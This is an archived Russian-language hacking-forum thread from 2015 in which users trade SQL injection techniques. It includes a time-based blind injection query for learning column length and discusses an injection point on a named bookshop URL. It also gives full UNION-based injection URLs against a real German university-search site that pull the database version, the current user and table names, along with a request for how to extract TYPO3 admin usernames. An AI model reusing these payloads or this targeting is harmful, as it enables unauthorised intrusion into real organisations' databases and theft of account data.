ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.03.2015, 21:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
26437
Репутация:
-2
|
|
Cпасибо парни, помогли
P.S. Спасибо, забыл совсем про отвественость
|
|
|
|
10.03.2015, 21:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
283
Репутация:
2
|
|
Есть blind sql injection, как правильно узнать длинну получаймой колонки. Использую такой запрос:
Код:
Code:
SELECT IF (SUBSTRING(LENGTH(login),{x},1) = {y}, SLEEP(5), 0) FROM users LIMIT 1
где {y} перебираймые значения "0,1,2,3,4,5,6,7,8,9"
Проблема в том, что substring возвращает "0", когда положение {x} вышло за длинну записи. В итоге получается, что при попытке получить второе значение (x=2), а истинная длинна = 5, то получаем, что длинна колонки = 50.
Собственно задача - правильно узнать длинну содержимого колонки, без лишних запросов.
upd. Решено |
|
|
|
10.03.2015, 23:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
15642
Репутация:
6
|
|
Сообщение от scr1m77
scr1m77 said:
Есть blind sql injection, как правильно узнать длинну получаймой колонки. Использую такой запрос:
Код:
Code:
SELECT IF (SUBSTRING(LENGTH(login),{x},1) = {y}, SLEEP(5), 0) FROM users LIMIT 1
где {y} перебираймые значения "0,1,2,3,4,5,6,7,8,9"
Проблема в том, что substring возвращает "0", когда положение {x} вышло за длинну записи. В итоге получается, что при попытке получить второе значение (x=2), а истинная длинна = 5, то получаем, что длинна колонки = 50.
Собственно задача - правильно узнать длинну содержимого колонки, без лишних запросов. может вместо login пехать что-нить такое: select column_name from information_schema.tables where table_name='users'
|
|
|
|
11.03.2015, 00:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от None
http://shop.priddybooks.com/SearchResultsNew.aspx?order=asc&search=123
есть тут что нибудь?
|
|
|
|
11.03.2015, 10:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от Br@!ns
Br@!ns said:
есть тут что нибудь?
Есть, mssql-инъекция.
|
|
|
|
11.03.2015, 18:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от YaBtr
YaBtr said:
Есть, mssql-инъекция.
Так же думаю, но раскрутить не получается. Дадите наводку?
|
|
|
|
11.03.2015, 18:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
168184
Репутация:
40
|
|
Сообщение от Br@!ns
Br@!ns said:
есть тут что нибудь?
Сообщение от YaBtr
YaBtr said:
Есть, mssql-инъекция.
Нету
Присутствует фильтрация символов, в случае ошибки вываливает редирект вот сюда
|
|
|
|
11.03.2015, 18:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от 5maks5
5maks5 said:
Нету
Присутствует фильтрация символов, в случае ошибки вываливает редирект
вот сюдаЧитайте, изучайте!
https://technet.microsoft.com/en-us/library/cc512676.aspx
|
|
|
|
12.03.2015, 13:04
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.hochschulkompass.de/studium/suche/profisuche/search/1/studtyp/3.html?tx_szhrksearch_pi1%5Bxtend%5D=1&tx_szhrksearch_pi1%5Bbundesland%5D%5B0%5D=2&tx_szhrksearch_pi1%5Bresults_at_a_time%5D=100&tx_szhrksearch_pi1[pointer]=1&tx_szhrksearch_pi1[detail]=all&tx_szhrksearch_pi1%5Bbesform%5D%5B0%5D=d'+union+select+null,version()||chr(58)||current_user||chr(58)||current_database()+--[/COLOR][/COLOR]
Как выковырять данные be_users.username ?
PS движок типо3, эти данные там есть точно! |
|
|
12.03.2015, 18:17
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от DezMond™
DezMond™ said:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.hochschulkompass.de/studium/suche/profisuche/search/1/studtyp/3.html?tx_szhrksearch_pi1%5Bxtend%5D=1&tx_szhrksearch_pi1%5Bbundesland%5D%5B0%5D=2&tx_szhrksearch_pi1%5Bresults_at_a_time%5D=100&tx_szhrksearch_pi1[pointer]=1&tx_szhrksearch_pi1[detail]=all&tx_szhrksearch_pi1%5Bbesform%5D%5B0%5D=d'+union+select+null,version()||chr(58)||current_user||chr(58)||current_database()+--[/COLOR][/COLOR]
Как выковырять данные be_users.username ?
PS движок типо3, эти данные там есть точно! уверены?
Код:
Code:
http://www.hochschulkompass.de/studium/suche/profisuche/search/1/studtyp/3.html
?tx_szhrksearch_pi1[xtend]=1
&tx_szhrksearch_pi1[bundesland][0]=2
&tx_szhrksearch_pi1[results_at_a_time]=100
&tx_szhrksearch_pi1[pointer]=1
&tx_szhrksearch_pi1[detail]=all
&tx_szhrksearch_pi1[besform][0]=d'+union+select+null,table_name+from+information_schema.tables--
|
|
|
|
|
 |
|
|
Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
|
|
|
|
Похожие темы
Комбинированный вид